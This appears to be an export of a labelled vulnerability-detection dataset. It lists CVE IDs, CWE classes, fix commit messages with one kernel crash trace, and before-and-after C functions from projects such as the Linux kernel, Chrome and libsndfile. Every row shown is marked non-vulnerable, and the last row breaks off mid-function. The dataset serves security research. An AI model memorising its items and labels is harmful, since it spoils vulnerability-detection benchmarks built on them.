CVE ID
stringlengths 13
43
⌀ | CVE Page
stringlengths 45
48
⌀ | CWE ID
stringclasses 90
values | codeLink
stringlengths 46
139
| commit_id
stringlengths 6
81
| commit_message
stringlengths 3
13.3k
⌀ | func_after
stringlengths 14
241k
| func_before
stringlengths 14
241k
| lang
stringclasses 3
values | project
stringclasses 309
values | vul
int8 0
1
|
---|---|---|---|---|---|---|---|---|---|---|
CVE-2017-1000249 | https://www.cvedetails.com/cve/CVE-2017-1000249/ | CWE-119 | https://github.com/file/file/commit/9611f31313a93aa036389c5f3b15eea53510d4d | 9611f31313a93aa036389c5f3b15eea53510d4d | Extend build-id reporting to 8-byte IDs that lld can generate (Ed Maste) | dophn_exec(struct magic_set *ms, int clazz, int swap, int fd, off_t off,
int num, size_t size, off_t fsize, int sh_num, int *flags,
uint16_t *notecount)
{
Elf32_Phdr ph32;
Elf64_Phdr ph64;
const char *linking_style = "statically";
const char *interp = "";
unsigned char nbuf[BUFSIZ];
char ibuf[BUFSIZ];
ssize_t bufsize;
size_t offset, align, len;
if (size != xph_sizeof) {
if (file_printf(ms, ", corrupted program header size") == -1)
return -1;
return 0;
}
for ( ; num; num--) {
if (pread(fd, xph_addr, xph_sizeof, off) < (ssize_t)xph_sizeof) {
file_badread(ms);
return -1;
}
off += size;
bufsize = 0;
align = 4;
/* Things we can determine before we seek */
switch (xph_type) {
case PT_DYNAMIC:
linking_style = "dynamically";
break;
case PT_NOTE:
if (sh_num) /* Did this through section headers */
continue;
if (((align = xph_align) & 0x80000000UL) != 0 ||
align < 4) {
if (file_printf(ms,
", invalid note alignment 0x%lx",
(unsigned long)align) == -1)
return -1;
align = 4;
}
/*FALLTHROUGH*/
case PT_INTERP:
len = xph_filesz < sizeof(nbuf) ? xph_filesz
: sizeof(nbuf);
bufsize = pread(fd, nbuf, len, xph_offset);
if (bufsize == -1) {
file_badread(ms);
return -1;
}
break;
default:
if (fsize != SIZE_UNKNOWN && xph_offset > fsize) {
/* Maybe warn here? */
continue;
}
break;
}
/* Things we can determine when we seek */
switch (xph_type) {
case PT_INTERP:
if (bufsize && nbuf[0]) {
nbuf[bufsize - 1] = '\0';
interp = (const char *)nbuf;
} else
interp = "*empty*";
break;
case PT_NOTE:
/*
* This is a PT_NOTE section; loop through all the notes
* in the section.
*/
offset = 0;
for (;;) {
if (offset >= (size_t)bufsize)
break;
offset = donote(ms, nbuf, offset,
(size_t)bufsize, clazz, swap, align,
flags, notecount, fd, 0, 0, 0);
if (offset == 0)
break;
}
break;
default:
break;
}
}
if (file_printf(ms, ", %s linked", linking_style)
== -1)
return -1;
if (interp[0])
if (file_printf(ms, ", interpreter %s",
file_printable(ibuf, sizeof(ibuf), interp)) == -1)
return -1;
return 0;
}
| dophn_exec(struct magic_set *ms, int clazz, int swap, int fd, off_t off,
int num, size_t size, off_t fsize, int sh_num, int *flags,
uint16_t *notecount)
{
Elf32_Phdr ph32;
Elf64_Phdr ph64;
const char *linking_style = "statically";
const char *interp = "";
unsigned char nbuf[BUFSIZ];
char ibuf[BUFSIZ];
ssize_t bufsize;
size_t offset, align, len;
if (size != xph_sizeof) {
if (file_printf(ms, ", corrupted program header size") == -1)
return -1;
return 0;
}
for ( ; num; num--) {
if (pread(fd, xph_addr, xph_sizeof, off) < (ssize_t)xph_sizeof) {
file_badread(ms);
return -1;
}
off += size;
bufsize = 0;
align = 4;
/* Things we can determine before we seek */
switch (xph_type) {
case PT_DYNAMIC:
linking_style = "dynamically";
break;
case PT_NOTE:
if (sh_num) /* Did this through section headers */
continue;
if (((align = xph_align) & 0x80000000UL) != 0 ||
align < 4) {
if (file_printf(ms,
", invalid note alignment 0x%lx",
(unsigned long)align) == -1)
return -1;
align = 4;
}
/*FALLTHROUGH*/
case PT_INTERP:
len = xph_filesz < sizeof(nbuf) ? xph_filesz
: sizeof(nbuf);
bufsize = pread(fd, nbuf, len, xph_offset);
if (bufsize == -1) {
file_badread(ms);
return -1;
}
break;
default:
if (fsize != SIZE_UNKNOWN && xph_offset > fsize) {
/* Maybe warn here? */
continue;
}
break;
}
/* Things we can determine when we seek */
switch (xph_type) {
case PT_INTERP:
if (bufsize && nbuf[0]) {
nbuf[bufsize - 1] = '\0';
interp = (const char *)nbuf;
} else
interp = "*empty*";
break;
case PT_NOTE:
/*
* This is a PT_NOTE section; loop through all the notes
* in the section.
*/
offset = 0;
for (;;) {
if (offset >= (size_t)bufsize)
break;
offset = donote(ms, nbuf, offset,
(size_t)bufsize, clazz, swap, align,
flags, notecount, fd, 0, 0, 0);
if (offset == 0)
break;
}
break;
default:
break;
}
}
if (file_printf(ms, ", %s linked", linking_style)
== -1)
return -1;
if (interp[0])
if (file_printf(ms, ", interpreter %s",
file_printable(ibuf, sizeof(ibuf), interp)) == -1)
return -1;
return 0;
}
| C | file | 0 |
CVE-2017-15128 | https://www.cvedetails.com/cve/CVE-2017-15128/ | CWE-119 | https://github.com/torvalds/linux/commit/1e3921471354244f70fe268586ff94a97a6dd4df | 1e3921471354244f70fe268586ff94a97a6dd4df | userfaultfd: hugetlbfs: prevent UFFDIO_COPY to fill beyond the end of i_size
This oops:
kernel BUG at fs/hugetlbfs/inode.c:484!
RIP: remove_inode_hugepages+0x3d0/0x410
Call Trace:
hugetlbfs_setattr+0xd9/0x130
notify_change+0x292/0x410
do_truncate+0x65/0xa0
do_sys_ftruncate.constprop.3+0x11a/0x180
SyS_ftruncate+0xe/0x10
tracesys+0xd9/0xde
was caused by the lack of i_size check in hugetlb_mcopy_atomic_pte.
mmap() can still succeed beyond the end of the i_size after vmtruncate
zapped vmas in those ranges, but the faults must not succeed, and that
includes UFFDIO_COPY.
We could differentiate the retval to userland to represent a SIGBUS like
a page fault would do (vs SIGSEGV), but it doesn't seem very useful and
we'd need to pick a random retval as there's no meaningful syscall
retval that would differentiate from SIGSEGV and SIGBUS, there's just
-EFAULT.
Link: http://lkml.kernel.org/r/20171016223914.2421-2-aarcange@redhat.com
Signed-off-by: Andrea Arcangeli <aarcange@redhat.com>
Reviewed-by: Mike Kravetz <mike.kravetz@oracle.com>
Cc: Mike Rapoport <rppt@linux.vnet.ibm.com>
Cc: "Dr. David Alan Gilbert" <dgilbert@redhat.com>
Cc: <stable@vger.kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | static ssize_t nr_overcommit_hugepages_store(struct kobject *kobj,
struct kobj_attribute *attr, const char *buf, size_t count)
{
int err;
unsigned long input;
struct hstate *h = kobj_to_hstate(kobj, NULL);
if (hstate_is_gigantic(h))
return -EINVAL;
err = kstrtoul(buf, 10, &input);
if (err)
return err;
spin_lock(&hugetlb_lock);
h->nr_overcommit_huge_pages = input;
spin_unlock(&hugetlb_lock);
return count;
}
| static ssize_t nr_overcommit_hugepages_store(struct kobject *kobj,
struct kobj_attribute *attr, const char *buf, size_t count)
{
int err;
unsigned long input;
struct hstate *h = kobj_to_hstate(kobj, NULL);
if (hstate_is_gigantic(h))
return -EINVAL;
err = kstrtoul(buf, 10, &input);
if (err)
return err;
spin_lock(&hugetlb_lock);
h->nr_overcommit_huge_pages = input;
spin_unlock(&hugetlb_lock);
return count;
}
| C | linux | 0 |
CVE-2014-9756 | https://www.cvedetails.com/cve/CVE-2014-9756/ | CWE-189 | https://github.com/erikd/libsndfile/commit/725c7dbb95bfaf8b4bb7b04820e3a00cceea9ce6 | 725c7dbb95bfaf8b4bb7b04820e3a00cceea9ce6 | src/file_io.c : Prevent potential divide-by-zero.
Closes: https://github.com/erikd/libsndfile/issues/92 | psf_close_handle (HANDLE handle)
{ if (handle == NULL)
return 0 ;
if (CloseHandle (handle) == 0)
return -1 ;
return 0 ;
} /* psf_close_handle */
| psf_close_handle (HANDLE handle)
{ if (handle == NULL)
return 0 ;
if (CloseHandle (handle) == 0)
return -1 ;
return 0 ;
} /* psf_close_handle */
| C | libsndfile | 0 |
CVE-2014-1743 | https://www.cvedetails.com/cve/CVE-2014-1743/ | CWE-399 | https://github.com/chromium/chromium/commit/6d9425ec7badda912555d46ea7abcfab81fdd9b9 | 6d9425ec7badda912555d46ea7abcfab81fdd9b9 | sync compositor: pass simple gfx types by const ref
See bug for reasoning
BUG=159273
Review URL: https://codereview.chromium.org/1417893006
Cr-Commit-Position: refs/heads/master@{#356653} | void AwContents::SetDipScale(JNIEnv* env, jobject obj, jfloat dip_scale) {
DCHECK_CURRENTLY_ON(BrowserThread::UI);
SetDipScaleInternal(dip_scale);
}
| void AwContents::SetDipScale(JNIEnv* env, jobject obj, jfloat dip_scale) {
DCHECK_CURRENTLY_ON(BrowserThread::UI);
SetDipScaleInternal(dip_scale);
}
| C | Chrome | 0 |
CVE-2012-2375 | https://www.cvedetails.com/cve/CVE-2012-2375/ | CWE-189 | https://github.com/torvalds/linux/commit/20e0fa98b751facf9a1101edaefbc19c82616a68 | 20e0fa98b751facf9a1101edaefbc19c82616a68 | Fix length of buffer copied in __nfs4_get_acl_uncached
_copy_from_pages() used to copy data from the temporary buffer to the
user passed buffer is passed the wrong size parameter when copying
data. res.acl_len contains both the bitmap and acl lenghts while
acl_len contains the acl length after adjusting for the bitmap size.
Signed-off-by: Sachin Prabhu <sprabhu@redhat.com>
Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com> | int nfs4_open_delegation_recall(struct nfs_open_context *ctx, struct nfs4_state *state, const nfs4_stateid *stateid)
{
struct nfs4_exception exception = { };
struct nfs_server *server = NFS_SERVER(state->inode);
int err;
do {
err = _nfs4_open_delegation_recall(ctx, state, stateid);
switch (err) {
case 0:
case -ENOENT:
case -ESTALE:
goto out;
case -NFS4ERR_BADSESSION:
case -NFS4ERR_BADSLOT:
case -NFS4ERR_BAD_HIGH_SLOT:
case -NFS4ERR_CONN_NOT_BOUND_TO_SESSION:
case -NFS4ERR_DEADSESSION:
nfs4_schedule_session_recovery(server->nfs_client->cl_session);
goto out;
case -NFS4ERR_STALE_CLIENTID:
case -NFS4ERR_STALE_STATEID:
case -NFS4ERR_EXPIRED:
/* Don't recall a delegation if it was lost */
nfs4_schedule_lease_recovery(server->nfs_client);
goto out;
case -ERESTARTSYS:
/*
* The show must go on: exit, but mark the
* stateid as needing recovery.
*/
case -NFS4ERR_DELEG_REVOKED:
case -NFS4ERR_ADMIN_REVOKED:
case -NFS4ERR_BAD_STATEID:
nfs_inode_find_state_and_recover(state->inode,
stateid);
nfs4_schedule_stateid_recovery(server, state);
case -EKEYEXPIRED:
/*
* User RPCSEC_GSS context has expired.
* We cannot recover this stateid now, so
* skip it and allow recovery thread to
* proceed.
*/
case -ENOMEM:
err = 0;
goto out;
}
err = nfs4_handle_exception(server, err, &exception);
} while (exception.retry);
out:
return err;
}
| int nfs4_open_delegation_recall(struct nfs_open_context *ctx, struct nfs4_state *state, const nfs4_stateid *stateid)
{
struct nfs4_exception exception = { };
struct nfs_server *server = NFS_SERVER(state->inode);
int err;
do {
err = _nfs4_open_delegation_recall(ctx, state, stateid);
switch (err) {
case 0:
case -ENOENT:
case -ESTALE:
goto out;
case -NFS4ERR_BADSESSION:
case -NFS4ERR_BADSLOT:
case -NFS4ERR_BAD_HIGH_SLOT:
case -NFS4ERR_CONN_NOT_BOUND_TO_SESSION:
case -NFS4ERR_DEADSESSION:
nfs4_schedule_session_recovery(server->nfs_client->cl_session);
goto out;
case -NFS4ERR_STALE_CLIENTID:
case -NFS4ERR_STALE_STATEID:
case -NFS4ERR_EXPIRED:
/* Don't recall a delegation if it was lost */
nfs4_schedule_lease_recovery(server->nfs_client);
goto out;
case -ERESTARTSYS:
/*
* The show must go on: exit, but mark the
* stateid as needing recovery.
*/
case -NFS4ERR_DELEG_REVOKED:
case -NFS4ERR_ADMIN_REVOKED:
case -NFS4ERR_BAD_STATEID:
nfs_inode_find_state_and_recover(state->inode,
stateid);
nfs4_schedule_stateid_recovery(server, state);
case -EKEYEXPIRED:
/*
* User RPCSEC_GSS context has expired.
* We cannot recover this stateid now, so
* skip it and allow recovery thread to
* proceed.
*/
case -ENOMEM:
err = 0;
goto out;
}
err = nfs4_handle_exception(server, err, &exception);
} while (exception.retry);
out:
return err;
}
| C | linux | 0 |
CVE-2016-9601 | https://www.cvedetails.com/cve/CVE-2016-9601/ | CWE-119 | http://git.ghostscript.com/?p=jbig2dec.git;a=commit;h=e698d5c11d27212aa1098bc5b1673a3378563092 | e698d5c11d27212aa1098bc5b1673a3378563092 | null | test_get_word(Jbig2WordStream *self, int offset, uint32_t *word)
{
/* assume test_stream[] is at least 4 bytes */
if (offset + 3 > sizeof(test_stream))
return -1;
*word = ((test_stream[offset] << 24) | (test_stream[offset + 1] << 16) | (test_stream[offset + 2] << 8) | (test_stream[offset + 3]));
return 0;
}
| test_get_word(Jbig2WordStream *self, int offset, uint32_t *word)
{
/* assume test_stream[] is at least 4 bytes */
if (offset + 3 > sizeof(test_stream))
return -1;
*word = ((test_stream[offset] << 24) | (test_stream[offset + 1] << 16) | (test_stream[offset + 2] << 8) | (test_stream[offset + 3]));
return 0;
}
| C | ghostscript | 0 |
CVE-2016-0850 | https://www.cvedetails.com/cve/CVE-2016-0850/ | CWE-264 | https://android.googlesource.com/platform/external/bluetooth/bluedroid/+/c677ee92595335233eb0e7b59809a1a94e7a678a | c677ee92595335233eb0e7b59809a1a94e7a678a | DO NOT MERGE Remove Porsche car-kit pairing workaround
Bug: 26551752
Change-Id: I14c5e3fcda0849874c8a94e48aeb7d09585617e1
| static BOOLEAN btm_sec_is_upgrade_possible(tBTM_SEC_DEV_REC *p_dev_rec, BOOLEAN is_originator)
{
UINT16 mtm_check = is_originator ? BTM_SEC_OUT_MITM : BTM_SEC_IN_MITM;
BOOLEAN is_possible = TRUE;
if (p_dev_rec->sec_flags & BTM_SEC_LINK_KEY_KNOWN)
{
is_possible = FALSE;
if(p_dev_rec->p_cur_service)
{
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible id:%d, link_key_typet:%d, rmt_io_caps:%d, chk flags:x%x, flags:x%x",
p_dev_rec->p_cur_service->service_id, p_dev_rec->link_key_type, p_dev_rec->rmt_io_caps,
mtm_check, p_dev_rec->p_cur_service->security_flags);
}
else
{
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible link_key_typet:%d, rmt_io_caps:%d, chk flags:x%x, ",
p_dev_rec->link_key_type, p_dev_rec->rmt_io_caps, mtm_check);
}
/* Already have a link key to the connected peer. Is the link key secure enough?
** Is a link key upgrade even possible?
*/
if ((p_dev_rec->security_required & mtm_check) /* needs MITM */
&& (p_dev_rec->link_key_type == BTM_LKEY_TYPE_UNAUTH_COMB) /* has unauthenticated link key */
&& (p_dev_rec->rmt_io_caps < BTM_IO_CAP_MAX) /* a valid peer IO cap */
&& (btm_sec_io_map[p_dev_rec->rmt_io_caps][btm_cb.devcb.loc_io_caps])) /* authenticated link key is possible */
{
/* upgrade is possible: check if the application wants the upgrade.
* If the application is configured to use a global MITM flag,
* it probably would not want to upgrade the link key based on the security level database */
is_possible = TRUE;
}
}
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible is_possible:%d sec_flags:0x%x", is_possible, p_dev_rec->sec_flags);
return is_possible;
}
| static BOOLEAN btm_sec_is_upgrade_possible(tBTM_SEC_DEV_REC *p_dev_rec, BOOLEAN is_originator)
{
UINT16 mtm_check = is_originator ? BTM_SEC_OUT_MITM : BTM_SEC_IN_MITM;
BOOLEAN is_possible = TRUE;
if (p_dev_rec->sec_flags & BTM_SEC_LINK_KEY_KNOWN)
{
is_possible = FALSE;
if(p_dev_rec->p_cur_service)
{
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible id:%d, link_key_typet:%d, rmt_io_caps:%d, chk flags:x%x, flags:x%x",
p_dev_rec->p_cur_service->service_id, p_dev_rec->link_key_type, p_dev_rec->rmt_io_caps,
mtm_check, p_dev_rec->p_cur_service->security_flags);
}
else
{
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible link_key_typet:%d, rmt_io_caps:%d, chk flags:x%x, ",
p_dev_rec->link_key_type, p_dev_rec->rmt_io_caps, mtm_check);
}
/* Already have a link key to the connected peer. Is the link key secure enough?
** Is a link key upgrade even possible?
*/
if ((p_dev_rec->security_required & mtm_check) /* needs MITM */
&& (p_dev_rec->link_key_type == BTM_LKEY_TYPE_UNAUTH_COMB) /* has unauthenticated link key */
&& (p_dev_rec->rmt_io_caps < BTM_IO_CAP_MAX) /* a valid peer IO cap */
&& (btm_sec_io_map[p_dev_rec->rmt_io_caps][btm_cb.devcb.loc_io_caps])) /* authenticated link key is possible */
{
/* upgrade is possible: check if the application wants the upgrade.
* If the application is configured to use a global MITM flag,
* it probably would not want to upgrade the link key based on the security level database */
is_possible = TRUE;
}
}
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible is_possible:%d sec_flags:0x%x", is_possible, p_dev_rec->sec_flags);
return is_possible;
}
| C | Android | 0 |
CVE-2013-2861 | https://www.cvedetails.com/cve/CVE-2013-2861/ | CWE-399 | https://github.com/chromium/chromium/commit/508b89a64ab700aa09f21fc666a5588b47360eab | 508b89a64ab700aa09f21fc666a5588b47360eab | Upgrade old app host to new app launcher on startup
This patch is a continuation of https://codereview.chromium.org/16805002/.
BUG=248825
Review URL: https://chromiumcodereview.appspot.com/17022015
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@209604 0039d316-1c4b-4281-b951-d872f2087c98 | string16 GetAppListShortcutName() {
chrome::VersionInfo::Channel channel = chrome::VersionInfo::GetChannel();
if (channel == chrome::VersionInfo::CHANNEL_CANARY)
return l10n_util::GetStringUTF16(IDS_APP_LIST_SHORTCUT_NAME_CANARY);
return l10n_util::GetStringUTF16(IDS_APP_LIST_SHORTCUT_NAME);
}
| string16 GetAppListShortcutName() {
chrome::VersionInfo::Channel channel = chrome::VersionInfo::GetChannel();
if (channel == chrome::VersionInfo::CHANNEL_CANARY)
return l10n_util::GetStringUTF16(IDS_APP_LIST_SHORTCUT_NAME_CANARY);
return l10n_util::GetStringUTF16(IDS_APP_LIST_SHORTCUT_NAME);
}
| C | Chrome | 0 |
CVE-2015-9016 | https://www.cvedetails.com/cve/CVE-2015-9016/ | CWE-362 | https://github.com/torvalds/linux/commit/0048b4837affd153897ed1222283492070027aa9 | 0048b4837affd153897ed1222283492070027aa9 | blk-mq: fix race between timeout and freeing request
Inside timeout handler, blk_mq_tag_to_rq() is called
to retrieve the request from one tag. This way is obviously
wrong because the request can be freed any time and some
fiedds of the request can't be trusted, then kernel oops
might be triggered[1].
Currently wrt. blk_mq_tag_to_rq(), the only special case is
that the flush request can share same tag with the request
cloned from, and the two requests can't be active at the same
time, so this patch fixes the above issue by updating tags->rqs[tag]
with the active request(either flush rq or the request cloned
from) of the tag.
Also blk_mq_tag_to_rq() gets much simplified with this patch.
Given blk_mq_tag_to_rq() is mainly for drivers and the caller must
make sure the request can't be freed, so in bt_for_each() this
helper is replaced with tags->rqs[tag].
[1] kernel oops log
[ 439.696220] BUG: unable to handle kernel NULL pointer dereference at 0000000000000158^M
[ 439.697162] IP: [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M
[ 439.700653] PGD 7ef765067 PUD 7ef764067 PMD 0 ^M
[ 439.700653] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC ^M
[ 439.700653] Dumping ftrace buffer:^M
[ 439.700653] (ftrace buffer empty)^M
[ 439.700653] Modules linked in: nbd ipv6 kvm_intel kvm serio_raw^M
[ 439.700653] CPU: 6 PID: 2779 Comm: stress-ng-sigfd Not tainted 4.2.0-rc5-next-20150805+ #265^M
[ 439.730500] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011^M
[ 439.730500] task: ffff880605308000 ti: ffff88060530c000 task.ti: ffff88060530c000^M
[ 439.730500] RIP: 0010:[<ffffffff812d89ba>] [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M
[ 439.730500] RSP: 0018:ffff880819203da0 EFLAGS: 00010283^M
[ 439.730500] RAX: ffff880811b0e000 RBX: ffff8800bb465f00 RCX: 0000000000000002^M
[ 439.730500] RDX: 0000000000000000 RSI: 0000000000000202 RDI: 0000000000000000^M
[ 439.730500] RBP: ffff880819203db0 R08: 0000000000000002 R09: 0000000000000000^M
[ 439.730500] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000202^M
[ 439.730500] R13: ffff880814104800 R14: 0000000000000002 R15: ffff880811a2ea00^M
[ 439.730500] FS: 00007f165b3f5740(0000) GS:ffff880819200000(0000) knlGS:0000000000000000^M
[ 439.730500] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b^M
[ 439.730500] CR2: 0000000000000158 CR3: 00000007ef766000 CR4: 00000000000006e0^M
[ 439.730500] Stack:^M
[ 439.730500] 0000000000000008 ffff8808114eed90 ffff880819203e00 ffffffff812dc104^M
[ 439.755663] ffff880819203e40 ffffffff812d9f5e 0000020000000000 ffff8808114eed80^M
[ 439.755663] Call Trace:^M
[ 439.755663] <IRQ> ^M
[ 439.755663] [<ffffffff812dc104>] bt_for_each+0x6e/0xc8^M
[ 439.755663] [<ffffffff812d9f5e>] ? blk_mq_rq_timed_out+0x6a/0x6a^M
[ 439.755663] [<ffffffff812d9f5e>] ? blk_mq_rq_timed_out+0x6a/0x6a^M
[ 439.755663] [<ffffffff812dc1b3>] blk_mq_tag_busy_iter+0x55/0x5e^M
[ 439.755663] [<ffffffff812d88b4>] ? blk_mq_bio_to_request+0x38/0x38^M
[ 439.755663] [<ffffffff812d8911>] blk_mq_rq_timer+0x5d/0xd4^M
[ 439.755663] [<ffffffff810a3e10>] call_timer_fn+0xf7/0x284^M
[ 439.755663] [<ffffffff810a3d1e>] ? call_timer_fn+0x5/0x284^M
[ 439.755663] [<ffffffff812d88b4>] ? blk_mq_bio_to_request+0x38/0x38^M
[ 439.755663] [<ffffffff810a46d6>] run_timer_softirq+0x1ce/0x1f8^M
[ 439.755663] [<ffffffff8104c367>] __do_softirq+0x181/0x3a4^M
[ 439.755663] [<ffffffff8104c76e>] irq_exit+0x40/0x94^M
[ 439.755663] [<ffffffff81031482>] smp_apic_timer_interrupt+0x33/0x3e^M
[ 439.755663] [<ffffffff815559a4>] apic_timer_interrupt+0x84/0x90^M
[ 439.755663] <EOI> ^M
[ 439.755663] [<ffffffff81554350>] ? _raw_spin_unlock_irq+0x32/0x4a^M
[ 439.755663] [<ffffffff8106a98b>] finish_task_switch+0xe0/0x163^M
[ 439.755663] [<ffffffff8106a94d>] ? finish_task_switch+0xa2/0x163^M
[ 439.755663] [<ffffffff81550066>] __schedule+0x469/0x6cd^M
[ 439.755663] [<ffffffff8155039b>] schedule+0x82/0x9a^M
[ 439.789267] [<ffffffff8119b28b>] signalfd_read+0x186/0x49a^M
[ 439.790911] [<ffffffff8106d86a>] ? wake_up_q+0x47/0x47^M
[ 439.790911] [<ffffffff811618c2>] __vfs_read+0x28/0x9f^M
[ 439.790911] [<ffffffff8117a289>] ? __fget_light+0x4d/0x74^M
[ 439.790911] [<ffffffff811620a7>] vfs_read+0x7a/0xc6^M
[ 439.790911] [<ffffffff8116292b>] SyS_read+0x49/0x7f^M
[ 439.790911] [<ffffffff81554c17>] entry_SYSCALL_64_fastpath+0x12/0x6f^M
[ 439.790911] Code: 48 89 e5 e8 a9 b8 e7 ff 5d c3 0f 1f 44 00 00 55 89
f2 48 89 e5 41 54 41 89 f4 53 48 8b 47 60 48 8b 1c d0 48 8b 7b 30 48 8b
53 38 <48> 8b 87 58 01 00 00 48 85 c0 75 09 48 8b 97 88 0c 00 00 eb 10
^M
[ 439.790911] RIP [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M
[ 439.790911] RSP <ffff880819203da0>^M
[ 439.790911] CR2: 0000000000000158^M
[ 439.790911] ---[ end trace d40af58949325661 ]---^M
Cc: <stable@vger.kernel.org>
Signed-off-by: Ming Lei <ming.lei@canonical.com>
Signed-off-by: Jens Axboe <axboe@fb.com> | static inline bool blk_mq_merge_queue_io(struct blk_mq_hw_ctx *hctx,
struct blk_mq_ctx *ctx,
struct request *rq, struct bio *bio)
{
if (!hctx_allow_merges(hctx)) {
blk_mq_bio_to_request(rq, bio);
spin_lock(&ctx->lock);
insert_rq:
__blk_mq_insert_request(hctx, rq, false);
spin_unlock(&ctx->lock);
return false;
} else {
struct request_queue *q = hctx->queue;
spin_lock(&ctx->lock);
if (!blk_mq_attempt_merge(q, ctx, bio)) {
blk_mq_bio_to_request(rq, bio);
goto insert_rq;
}
spin_unlock(&ctx->lock);
__blk_mq_free_request(hctx, ctx, rq);
return true;
}
}
| static inline bool blk_mq_merge_queue_io(struct blk_mq_hw_ctx *hctx,
struct blk_mq_ctx *ctx,
struct request *rq, struct bio *bio)
{
if (!hctx_allow_merges(hctx)) {
blk_mq_bio_to_request(rq, bio);
spin_lock(&ctx->lock);
insert_rq:
__blk_mq_insert_request(hctx, rq, false);
spin_unlock(&ctx->lock);
return false;
} else {
struct request_queue *q = hctx->queue;
spin_lock(&ctx->lock);
if (!blk_mq_attempt_merge(q, ctx, bio)) {
blk_mq_bio_to_request(rq, bio);
goto insert_rq;
}
spin_unlock(&ctx->lock);
__blk_mq_free_request(hctx, ctx, rq);
return true;
}
}
| C | linux | 0 |
CVE-2013-1819 | https://www.cvedetails.com/cve/CVE-2013-1819/ | CWE-20 | https://github.com/torvalds/linux/commit/eb178619f930fa2ba2348de332a1ff1c66a31424 | eb178619f930fa2ba2348de332a1ff1c66a31424 | xfs: fix _xfs_buf_find oops on blocks beyond the filesystem end
When _xfs_buf_find is passed an out of range address, it will fail
to find a relevant struct xfs_perag and oops with a null
dereference. This can happen when trying to walk a filesystem with a
metadata inode that has a partially corrupted extent map (i.e. the
block number returned is corrupt, but is otherwise intact) and we
try to read from the corrupted block address.
In this case, just fail the lookup. If it is readahead being issued,
it will simply not be done, but if it is real read that fails we
will get an error being reported. Ideally this case should result
in an EFSCORRUPTED error being reported, but we cannot return an
error through xfs_buf_read() or xfs_buf_get() so this lookup failure
may result in ENOMEM or EIO errors being reported instead.
Signed-off-by: Dave Chinner <dchinner@redhat.com>
Reviewed-by: Brian Foster <bfoster@redhat.com>
Reviewed-by: Ben Myers <bpm@sgi.com>
Signed-off-by: Ben Myers <bpm@sgi.com> | xfs_buf_ioend(
struct xfs_buf *bp,
int schedule)
{
bool read = !!(bp->b_flags & XBF_READ);
trace_xfs_buf_iodone(bp, _RET_IP_);
if (bp->b_error == 0)
bp->b_flags |= XBF_DONE;
if (bp->b_iodone || (read && bp->b_ops) || (bp->b_flags & XBF_ASYNC)) {
if (schedule) {
INIT_WORK(&bp->b_iodone_work, xfs_buf_iodone_work);
queue_work(xfslogd_workqueue, &bp->b_iodone_work);
} else {
xfs_buf_iodone_work(&bp->b_iodone_work);
}
} else {
bp->b_flags &= ~(XBF_READ | XBF_WRITE | XBF_READ_AHEAD);
complete(&bp->b_iowait);
}
}
| xfs_buf_ioend(
struct xfs_buf *bp,
int schedule)
{
bool read = !!(bp->b_flags & XBF_READ);
trace_xfs_buf_iodone(bp, _RET_IP_);
if (bp->b_error == 0)
bp->b_flags |= XBF_DONE;
if (bp->b_iodone || (read && bp->b_ops) || (bp->b_flags & XBF_ASYNC)) {
if (schedule) {
INIT_WORK(&bp->b_iodone_work, xfs_buf_iodone_work);
queue_work(xfslogd_workqueue, &bp->b_iodone_work);
} else {
xfs_buf_iodone_work(&bp->b_iodone_work);
}
} else {
bp->b_flags &= ~(XBF_READ | XBF_WRITE | XBF_READ_AHEAD);
complete(&bp->b_iowait);
}
}
| C | linux | 0 |
CVE-2012-6548 | https://www.cvedetails.com/cve/CVE-2012-6548/ | CWE-200 | https://github.com/torvalds/linux/commit/0143fc5e9f6f5aad4764801015bc8d4b4a278200 | 0143fc5e9f6f5aad4764801015bc8d4b4a278200 | udf: avoid info leak on export
For type 0x51 the udf.parent_partref member in struct fid gets copied
uninitialized to userland. Fix this by initializing it to 0.
Signed-off-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Jan Kara <jack@suse.cz> | static struct fileIdentDesc *udf_add_entry(struct inode *dir,
struct dentry *dentry,
struct udf_fileident_bh *fibh,
struct fileIdentDesc *cfi, int *err)
{
struct super_block *sb = dir->i_sb;
struct fileIdentDesc *fi = NULL;
unsigned char *name = NULL;
int namelen;
loff_t f_pos;
loff_t size = udf_ext0_offset(dir) + dir->i_size;
int nfidlen;
uint8_t lfi;
uint16_t liu;
int block;
struct kernel_lb_addr eloc;
uint32_t elen = 0;
sector_t offset;
struct extent_position epos = {};
struct udf_inode_info *dinfo;
fibh->sbh = fibh->ebh = NULL;
name = kmalloc(UDF_NAME_LEN, GFP_NOFS);
if (!name) {
*err = -ENOMEM;
goto out_err;
}
if (dentry) {
if (!dentry->d_name.len) {
*err = -EINVAL;
goto out_err;
}
namelen = udf_put_filename(sb, dentry->d_name.name, name,
dentry->d_name.len);
if (!namelen) {
*err = -ENAMETOOLONG;
goto out_err;
}
} else {
namelen = 0;
}
nfidlen = (sizeof(struct fileIdentDesc) + namelen + 3) & ~3;
f_pos = udf_ext0_offset(dir);
fibh->soffset = fibh->eoffset = f_pos & (dir->i_sb->s_blocksize - 1);
dinfo = UDF_I(dir);
if (dinfo->i_alloc_type != ICBTAG_FLAG_AD_IN_ICB) {
if (inode_bmap(dir, f_pos >> dir->i_sb->s_blocksize_bits, &epos,
&eloc, &elen, &offset) != (EXT_RECORDED_ALLOCATED >> 30)) {
block = udf_get_lb_pblock(dir->i_sb,
&dinfo->i_location, 0);
fibh->soffset = fibh->eoffset = sb->s_blocksize;
goto add;
}
block = udf_get_lb_pblock(dir->i_sb, &eloc, offset);
